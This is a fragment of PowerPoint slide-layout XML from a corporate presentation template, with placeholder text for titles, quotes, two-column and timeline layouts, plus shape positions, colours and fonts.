            <a:lvl3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3pPr>
            <a:lvl4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4pPr>
            <a:lvl5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5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to add a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sk-SK"/>
              <a:t> text</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Zástupný objekt pre text 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88043803-0909-18DD-0BE9-61A3DFCD81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047290" y="2961294"/>
            <a:ext cx="4364410" cy="4364410"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="004B55">
              <a:alpha val="90000"/>
            </a:srgb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b="0" spc="-4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buNone/>
              <a:defRPr sz="3500" spc="-40" baseline="0"/>
            </a:lvl2pPr>
            <a:lvl3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3pPr>
            <a:lvl4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4pPr>
            <a:lvl5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5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to add a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sk-SK"/>
              <a:t>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2255D5-BE13-A060-ABF6-6EBD63EEB9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6300" y="920729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05608186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327363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sh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icon&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F78073A-8B32-09C7-B324-E42CE96B98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0836092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19AECA83-EE18-D1B9-CC97-0456839636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72000" y="8784000"/>
            <a:ext cx="4147826" cy="720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6753301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Turq">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="0096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36068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Turq Logo">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="0096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2787FA0-CC15-1EBF-C8A8-DFDB7965F4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72000" y="8784000"/>
            <a:ext cx="4103234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222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37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B628CA8A-9B39-A894-29F7-A0F71F5A2250}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1" y="0"/>
            <a:ext cx="5516544" cy="4887510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00BBC5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5A3967B-AF19-EE67-D7BE-0FB7373A62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36899" b="45426"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9709598" y="4672484"/>
            <a:ext cx="8578398" cy="56145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E933BF-CDCA-88B4-39D8-28E76FFDD7C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7508387" y="876300"/>
            <a:ext cx="32712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SK" sz="16000">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>“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EE450E6-E35F-A2CE-E8A3-6235FEB5FC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2974" y="2188586"/>
            <a:ext cx="16402050" cy="571240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10000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr sz="7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Quotes paragraph – 72pt </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" err="1"/>
              <a:t>GothicNeo</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Short quotes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CD9756B-9963-C7F6-B67A-49C3AF0077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2975" y="8098413"/>
            <a:ext cx="16468725" cy="1028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685800" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:lvl2pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Name Surname / job title, company</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="198675016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ong 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23E5BAD-4D51-21CF-1819-A2BD669937EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="296336" y="-1"/>
            <a:ext cx="17991664" cy="10287001"/>
            <a:chOff x="296336" y="-1"/>
            <a:chExt cx="17991664" cy="10287001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ED455D62-C784-47EB-CB87-8BD692BF091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9984"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="764687" y="-1"/>
              <a:ext cx="6743700" cy="4085143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A42A9421-8482-FD38-6E8D-3FA797BAB01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9984"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="7388512" y="-1"/>
              <a:ext cx="6743700" cy="4085144"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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C5948433-447A-E6D1-4944-38BB830D3DC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t="19984" r="48504"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="14815224" y="-1"/>
              <a:ext cx="3472776" cy="4085143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003DA56D-CAB4-DE77-55CF-9D669766C4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296336" y="3417929"/>
              <a:ext cx="6743700" cy="5105400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180935DE-E67D-0F71-6FEC-E26E0EB382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920161" y="3417929"/>
              <a:ext cx="6743700" cy="5105400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24C59549-3BF0-97B3-091A-5A5ED0FAF06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41558"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="14346873" y="3417929"/>
              <a:ext cx="3941127" cy="5105400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FC579437-2D6C-63AB-4E67-70F3A2381DF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55007"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="296336" y="7989929"/>
              <a:ext cx="6743700" cy="2297071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464A56D-0203-596E-0E65-33B20A616E2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55007"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="6920161" y="7989929"/>
              <a:ext cx="6743700" cy="2297071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F3D8E65B-EC73-07F5-4CEB-57A8DB5843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r="41558" b="55007"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="14346873" y="7989929"/>
              <a:ext cx="3941127" cy="2297071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3E933BF-CDCA-88B4-39D8-28E76FFDD7C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7508387" y="876300"/>
            <a:ext cx="32712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SK" sz="16000">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>“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EE450E6-E35F-A2CE-E8A3-6235FEB5FC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2294836"/>
            <a:ext cx="16535400" cy="558113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20000"/>
              </a:lnSpc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Quotes paragraph – 32pt </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" err="1"/>
              <a:t>GothicNeo</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Long Quote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CD9756B-9963-C7F6-B67A-49C3AF0077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8376464"/>
            <a:ext cx="16535400" cy="1028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685800" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:lvl2pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Name Surname / job title, company</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="161193829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Multiple quote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23E5BAD-4D51-21CF-1819-A2BD669937EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="296336" y="-1"/>
            <a:ext cx="17991664" cy="10287001"/>
            <a:chOff x="296336" y="-1"/>
            <a:chExt cx="17991664" cy="10287001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ED455D62-C784-47EB-CB87-8BD692BF091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9984"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="764687" y="-1"/>
              <a:ext cx="6743700" cy="4085143"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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A42A9421-8482-FD38-6E8D-3FA797BAB01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9984"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="7388512" y="-1"/>
              <a:ext cx="6743700" cy="4085144"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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C5948433-447A-E6D1-4944-38BB830D3DC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9984" r="48504"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="14815224" y="-1"/>
              <a:ext cx="3472776" cy="4085143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003DA56D-CAB4-DE77-55CF-9D669766C4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296336" y="3417929"/>
              <a:ext cx="6743700" cy="5105400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180935DE-E67D-0F71-6FEC-E26E0EB382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920161" y="3417929"/>
              <a:ext cx="6743700" cy="5105400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24C59549-3BF0-97B3-091A-5A5ED0FAF06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1558"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="14346873" y="3417929"/>
              <a:ext cx="3941127" cy="5105400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FC579437-2D6C-63AB-4E67-70F3A2381DF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55007"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="296336" y="7989929"/>
              <a:ext cx="6743700" cy="2297071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D464A56D-0203-596E-0E65-33B20A616E2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55007"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="6920161" y="7989929"/>
              <a:ext cx="6743700" cy="2297071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F3D8E65B-EC73-07F5-4CEB-57A8DB5843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r="41558" b="55007"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="14346873" y="7989929"/>
              <a:ext cx="3941127" cy="2297071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3E933BF-CDCA-88B4-39D8-28E76FFDD7C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7508387" y="876300"/>
            <a:ext cx="32712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SK" sz="16000">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>“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EE450E6-E35F-A2CE-E8A3-6235FEB5FC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554" y="1892229"/>
            <a:ext cx="7509650" cy="211856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20000"/>
              </a:lnSpc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Quotes paragraph – 32pt </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" err="1"/>
              <a:t>GothicNeo</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Multiple Quotes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CD9756B-9963-C7F6-B67A-49C3AF0077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81784" y="4072371"/>
            <a:ext cx="4231191" cy="1028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685800" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:lvl2pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Name Surname / job title, company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02423484-F095-5EEB-70F3-5F4E64A776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554" y="5928971"/>
            <a:ext cx="7509650" cy="211856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20000"/>
              </a:lnSpc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Quotes paragraph – 32pt </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" err="1"/>
              <a:t>GothicNeo</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Multiple Quotes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F0EF1770-883E-816F-2BCB-07293E30BE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81784" y="8109113"/>
            <a:ext cx="4231191" cy="1028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685800" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:lvl2pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Name Surname / job title, company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C0E46EEE-E89F-7256-9E28-4B10498622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62085" y="5928971"/>
            <a:ext cx="7509650" cy="211856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20000"/>
              </a:lnSpc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Quotes paragraph – 32pt </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" err="1"/>
              <a:t>GothicNeo</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Multiple Quotes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E2192354-4EA9-F6E7-3C0A-92833DCB21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201315" y="8109113"/>
            <a:ext cx="4231191" cy="1028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685800" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:lvl2pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Name Surname / job title, company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453943F4-6F51-9127-E4BE-123857B3D2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62085" y="1869927"/>
            <a:ext cx="7509650" cy="211856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20000"/>
              </a:lnSpc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Quotes paragraph – 32pt </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" err="1"/>
              <a:t>GothicNeo</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Multiple Quotes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5F24E5F-B63E-4B8F-C1FA-0A1DB8791D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201315" y="4050069"/>
            <a:ext cx="4231191" cy="1028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685800" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:lvl2pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Name Surname / job title, company</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41136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- icon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37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03A12C4E-DA69-FA37-FF05-4391289CADBC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25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2A863C4-EE50-C944-62F5-23F9B7DF4C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95D6E87-A13D-F566-D62D-EB57A53FFE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4D65F5C-279D-1C32-AB79-DE7A980F5F2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C24A49B-8A2A-01E4-1C90-B689E2623C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1ECDAA4-7FBB-0A86-59CC-762B49D7AE0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620309B-D431-8C59-4EBC-F88AAD774DB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55568-8BF1-6077-6CC0-55CE0032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0047EC7F-2055-2B5D-763B-0E495C6C015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614186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375504B-3473-87CF-CD36-1DC25335C1F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948262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C7307972-992B-FB4F-8AC2-194E14BDA5E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0282338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DEAFCF0E-932D-33E3-7F0C-234D1E69AE0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4616414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00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stlpcovy + odrazky 2blo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DAFF146E-597A-E9DC-782F-B3A0CB3F6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E7037D-43C7-9137-36C8-186FE94585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9513" y="885558"/>
            <a:ext cx="10515600" cy="964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Slide title</a:t>
            </a:r>
            <a:endParaRPr lang="en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2234D0-83D8-9E99-3998-B1ACA3D3466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59513" y="3655148"/>
            <a:ext cx="7658013" cy="5399951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424D5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35C6AE-BF0E-FFC9-29FE-78B1089E17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9513" y="1935736"/>
            <a:ext cx="7754697" cy="13255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424D5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Title column 1</a:t>
            </a:r>
            <a:endParaRPr lang="en-S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A08977-F3B0-589A-72AB-C22FDA34EF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17899" y="3655149"/>
            <a:ext cx="7658013" cy="5399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424D5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2CD0EBA-F611-25D4-F867-65B9970A36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3791" y="1935737"/>
            <a:ext cx="8914209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424D5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Title column 2</a:t>
            </a:r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216958648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lpcovy + odrazky 2bloky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DAFF146E-597A-E9DC-782F-B3A0CB3F6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E7037D-43C7-9137-36C8-186FE94585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9513" y="885558"/>
            <a:ext cx="10515600" cy="964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Slide title</a:t>
            </a:r>
            <a:endParaRPr lang="en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2234D0-83D8-9E99-3998-B1ACA3D3466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59513" y="3655148"/>
            <a:ext cx="7658013" cy="5399951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35C6AE-BF0E-FFC9-29FE-78B1089E17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9513" y="1935736"/>
            <a:ext cx="7754697" cy="13255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Title column 1</a:t>
            </a:r>
            <a:endParaRPr lang="en-S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A08977-F3B0-589A-72AB-C22FDA34EF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17899" y="3655149"/>
            <a:ext cx="7658013" cy="5399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2CD0EBA-F611-25D4-F867-65B9970A36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3791" y="1935737"/>
            <a:ext cx="8914209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Title column 2</a:t>
            </a:r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163204329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-timeline - sta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9854CB-96F3-8967-1875-9880D2AB0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47399"/>
            <a:ext cx="18372268" cy="10334399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6878E4B-CFB2-4A4F-A1A2-5AF7E8820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9140158" y="2701530"/>
            <a:ext cx="9818" cy="758547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0BF5CE63-0106-C340-BA7B-2C743C719E60}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9031624" y="4410623"/>
            <a:ext cx="216000" cy="21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0951664-9FE0-2D49-B8B4-01C751C0CA7C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9035522" y="2701530"/>
            <a:ext cx="216956" cy="21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C4679EC-319E-7A4B-BE52-6DF8424D4DC7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9031624" y="6119715"/>
            <a:ext cx="216000" cy="21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A08262D-99B6-1641-93FE-89AA3E5502A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9031624" y="7828806"/>
            <a:ext cx="216000" cy="21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686DB7-D9DA-883F-8442-A210D9692E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4294835"/>
            <a:ext cx="7886114" cy="511175"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="r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3AEA1AA-D032-9A66-869F-3E7D51E480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6300" y="5045331"/>
            <a:ext cx="7886114" cy="1703779"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="r">
              <a:buNone/>
              <a:defRPr sz="2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E4E6E6C-0087-FDB1-6385-451495DBCE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6300" y="7573218"/>
            <a:ext cx="7886114" cy="511175"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="r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6B8534C-E073-DCA3-6DD7-5907964428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6300" y="8323714"/>
            <a:ext cx="7886114" cy="1703779"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="r">
              <a:buNone/>
              <a:defRPr sz="2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0B49C13-4C54-6D47-9047-B332D7B867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25586" y="2445942"/>
            <a:ext cx="7856660" cy="511175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0B159565-6D03-B80D-5D0F-6B248563FF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25586" y="3196438"/>
            <a:ext cx="7856660" cy="1703779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2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A7BAAA8-E8D6-30E1-1884-164060623DE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25586" y="6008292"/>
            <a:ext cx="7886114" cy="511175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B9F9338A-9B8B-2528-D93E-8FB2360317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25586" y="6758788"/>
            <a:ext cx="7886114" cy="1703779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2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3F14EDA-E881-A71A-B2CF-71CCA50D01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6300" y="857228"/>
            <a:ext cx="16505946" cy="939676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Title 42pt</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11919443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7" grpId="0" animBg="1"/>
      <p:bldP spid="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meline - middle">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="008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6878E4B-CFB2-4A4F-A1A2-5AF7E8820267}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9144001" y="10287000"/>
            <a:ext cx="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0BF5CE63-0106-C340-BA7B-2C743C719E60}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9031624" y="4410623"/>
            <a:ext cx="216000" cy="21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0951664-9FE0-2D49-B8B4-01C751C0CA7C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9031148" y="2701530"/>
            <a:ext cx="216956" cy="21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C4679EC-319E-7A4B-BE52-6DF8424D4DC7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9031624" y="6119715"/>
            <a:ext cx="216000" cy="21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A08262D-99B6-1641-93FE-89AA3E5502A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9031624" y="7828806"/>
            <a:ext cx="216000" cy="216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686DB7-D9DA-883F-8442-A210D9692E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4294835"/>
            <a:ext cx="7886114" cy="511175"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="r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3AEA1AA-D032-9A66-869F-3E7D51E480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6300" y="5045331"/>
            <a:ext cx="7886114" cy="1703779"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="r">
              <a:buNone/>
              <a:defRPr sz="2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E4E6E6C-0087-FDB1-6385-451495DBCE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6300" y="7573218"/>
            <a:ext cx="7886114" cy="511175"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="r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6B8534C-E073-DCA3-6DD7-5907964428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6300" y="8323714"/>
            <a:ext cx="7886114" cy="1703779"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="r">
              <a:buNone/>
              <a:defRPr sz="2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0B49C13-4C54-6D47-9047-B332D7B867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25586" y="2445942"/>
            <a:ext cx="7856660" cy="511175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0B159565-6D03-B80D-5D0F-6B248563FF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25586" y="3196438"/>
            <a:ext cx="7856660" cy="1703779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2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A7BAAA8-E8D6-30E1-1884-164060623DE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25586" y="6008292"/>
            <a:ext cx="7886114" cy="511175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B9F9338A-9B8B-2528-D93E-8FB2360317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25586" y="6758788"/>
            <a:ext cx="7886114" cy="1703779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2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3F14EDA-E881-A71A-B2CF-71CCA50D01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6300" y="857228"/>
            <a:ext cx="16505946" cy="939676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Title 42pt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21DD327-83FA-0096-250D-F9302A122ED0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="9144000" y="-174171"/>
            <a:ext cx="0" cy="10441583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2806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7" grpId="0" animBg="1"/>
      <p:bldP spid="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urquois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5B541-DD3C-450E-B1E7-1E4AEBD185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6627" y="540000"/>
            <a:ext cx="16200000" cy="108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B5AC1-849E-42E0-9CB9-8DC09168EA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6627" y="2160000"/>
            <a:ext cx="16200000" cy="7560000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="514350" indent="-514350">
              <a:buClr>
                <a:schemeClr val="bg1"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="1073945" indent="-538163">
              <a:buClr>
                <a:schemeClr val="bg1"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1612107" indent="-538163">
              <a:buClr>
                <a:schemeClr val="bg1"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="2743131" indent="0">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="3657509" indent="0">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="3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eadit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7856428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hape">
    <p:bg bwMode="ltGray"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!!SHAPE">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{69981505-D3DA-5160-7E94-4195B44B7B61}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9675293" y="-9288798"/>
            <a:ext cx="33733770" cy="25536676"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 5937728 w 6691457"/>
              <a:gd name="connsiteY0" fmla="*/ 2573648 h 5065475"/>
              <a:gd name="connsiteX1" fmla="*/ 6039311 w 6691457"/>
              <a:gd name="connsiteY1" fmla="*/ 2514974 h 5065475"/>
              <a:gd name="connsiteX2" fmla="*/ 6656049 w 6691457"/>
              <a:gd name="connsiteY2" fmla="*/ 1791550 h 5065475"/>
              <a:gd name="connsiteX3" fmla="*/ 6656144 w 6691457"/>
              <a:gd name="connsiteY3" fmla="*/ 1791169 h 5065475"/>
              <a:gd name="connsiteX4" fmla="*/ 6656144 w 6691457"/>
              <a:gd name="connsiteY4" fmla="*/ 1791169 h 5065475"/>
